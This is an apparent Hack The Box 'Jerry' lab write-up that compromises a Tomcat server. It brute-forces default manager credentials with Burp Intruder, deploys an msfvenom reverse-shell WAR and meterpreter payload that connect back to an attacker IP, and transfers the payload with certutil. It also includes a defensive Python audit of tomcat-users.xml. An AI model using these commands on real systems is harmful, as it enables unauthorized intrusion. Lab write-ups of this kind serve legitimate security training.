Jerry
HTB - 5. Jerry (Default Credentials)
nmap -T4 -p- -A 10.10.10.95
shows 8080 open with Apache Tomcat/Coyote JSP engine 1.1 and Tomcat version 7.0.88.
Go to 10.10.10.95 and it shows the Apache Tomcat default page.
Search "tomcat default credentials" and found https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown
Burp Suite
Click server management page
Try login with
tomcat:tomcat
Send to decoder
Select authorization basic and decode as base64
Forwarded and did not work
Try again and sent to repeater and intruder
Create passwords
Get from the url and replace " " with ":".
Write bash script to base64 encode all the credentials
# one user:pass per line in tomcat.txt; read -r keeps the line intact, printf '%s' emits no trailing newline
while IFS= read -r cred; do printf '%s' "$cred" | base64; done < tomcat.txt
Back to Burp Suite Intruder
Set to sniper attack
Select the authorization basic
Paste in list of base64 encoded usernames and passwords into Payloads/Payload Options
Disable URL encoder
Run it; the successful credentials return a 200 with a much longer response length:
tomcat:s3cret
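An added defender-side check (my code, not part of the writeup): it parses the same "user password" line layout as the public default-credential list and audits a tomcat-users.xml for accounts still using a published default, ranking hits on manager-capable roles highest. The list excerpt and the XML below are constructed samples, not real files.

```python
import xml.etree.ElementTree as ET

# Constructed excerpt in the "user password" per-line layout of the public list.
DEFAULT_CREDS_TEXT = """\
tomcat tomcat
admin admin
tomcat s3cret
"""

# Constructed sample tomcat-users.xml; not taken from any real host.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="Xq9!vL2#pWz8" roles="manager-script"/>
  <user username="reader" password="tomcat" roles="viewer"/>
</tomcat-users>
"""

# Standard Tomcat role names that grant manager/host-manager access.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

def parse_default_creds(text):
    """Turn 'user password' lines into a set of (user, password) tuples."""
    pairs = set()
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2:
            pairs.add((parts[0], parts[1]))
    return pairs

def audit_tomcat_users(xml_text, default_creds):
    """Return (username, reason, severity) for each <user> using a default."""
    default_passwords = {pw for _, pw in default_creds}
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if elem.tag.rsplit("}", 1)[-1] != "user":  # strip the XML namespace
            continue
        name, pw = elem.get("username", ""), elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",")}
        if (name, pw) in default_creds:
            reason = "default username:password pair"
        elif pw in default_passwords:
            reason = "password appears in default list"
        else:
            continue  # not a known default; nothing to report
        # A default on a manager-capable account allows WAR deployment: rank it higher.
        severity = "HIGH" if roles & PRIVILEGED_ROLES else "MEDIUM"
        findings.append((name, reason, severity))
    return findings
```

Point it at the downloaded list and the live conf/tomcat-users.xml to get the same tuples for a real host.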
Create WAR file exploit
Search "tomcat war reverse shell msfvenom": https://netsec.ws/?p=331
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f war > shell.war
which will try to connect back to our machine on port 4444.
nc -nvlp 4444
to listen on port 4444.
Upload to the Tomcat manager and deploy.
Go to /shell and got nt authority\system.
whoami
cd c:\users\administrator
cd Desktop
cd flags
dir
arp -a
New reverse shell. Create payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=5555 -f exe > sh.exe
Listen on port 5555:
sudo msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
options
set LHOST 10.10.14.24
set LPORT 5555
run
Transfer file to windows:
python -m SimpleHTTPServer 80    <-- start server on attacker
certutil -urlcache -f http://10.10.14.24/sh.exe c:\users\administrator\desktop\flags\sh.exe    <-- on victim
dir sh.exe
Result: shell popped